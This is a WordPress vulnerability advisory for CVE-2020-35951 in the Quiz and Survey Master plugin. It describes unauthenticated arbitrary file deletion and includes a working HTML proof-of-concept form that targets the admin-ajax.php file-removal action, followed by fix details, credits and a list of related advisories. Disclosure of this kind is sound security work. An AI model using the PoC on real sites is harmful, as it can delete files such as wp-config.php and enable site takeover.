Quiz and Survey Master < 7.0.1 – Unauthenticated Arbitrary File Deletion | CVE 2020-35951 | Plugin Vulnerabilities

Description

This flaw allows users to delete arbitrary files like a site’s wp-config.php file which could effectively take a site offline and allow an attacker to take over the vulnerable site.

Proof of Concept

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://YOURURL/wp-admin/admin-ajax.php" method="POST" enctype="multipart/form-data">
      <input type="hidden" name="action" value="qsm_remove_file_fd_question" />
      <input type="hidden" name="file_url" value="/path/to/file" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Affects Plugins

quiz-master-next

Fixed in 7.0.1

References

CVE

URL

https://www.wordfence.com/blog/2020/08/critical-vulnerabilities-patched-in-quiz-and-survey-master-plugin/

Miscellaneous

Original Researcher

Chloe Chamberland

Submitter

Chloe Chamberland

Submitter website

https://wordfence.com

Submitter twitter

Verified

No

WPVDB ID

2c6a695f-7eb6-4d26-9c59-7ced35cd6129

Timeline

Publicly Published

2020-08-13 (about 5 years ago)

Added

2020-08-13 (about 5 years ago)

Last Updated

2021-01-02 (about 5 years ago)

Other

Published

Title

Published

2026-02-17

Title

Passster < 4.2.26 - Global Protection Bypass

Published

2019-04-24

Title

WP Database Backup < 5.2 - Unauthenticated OS Command Injection

Published

2018-11-12

Title

Social Sharing Plugin - Kiwi < 2.0.11 - Arbitrary WordPress Options Update

Published

2024-06-18

Title

Login with phone number < 1.7.35 - Insecure Password Reset Mechanism

Published

2010-12-15

Title

Cforms & CformsII <= 14.10.1 - CAPTCHA Bypass